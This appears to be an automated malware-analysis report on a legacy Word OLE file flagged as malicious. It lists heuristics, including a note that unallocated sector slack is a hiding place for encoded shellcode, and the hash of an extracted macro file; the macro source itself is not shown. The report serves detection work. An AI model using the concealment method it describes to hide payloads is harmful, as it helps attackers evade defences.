Verdict: MALICIOUS
Risk score: 82

Heuristics (4)

- OLE document has large unaccounted-for region (severity: high, rule: OLE_SLACK_ANOMALY). OLE file is 65,646 bytes but its declared streams total only 35,445 bytes; the remaining 30,201 bytes (46%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected (severity: medium, rule: OLE_VBA_MACROS). Document contains VBA macro code.
- Embedded URL (severity: info, rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5634 bytes | 78030b5675f5315c5a9a0cb1e7eefa5b760cd92034947d44d088fad986ec63cf |

Script preview (first 1,000 lines of the extracted script)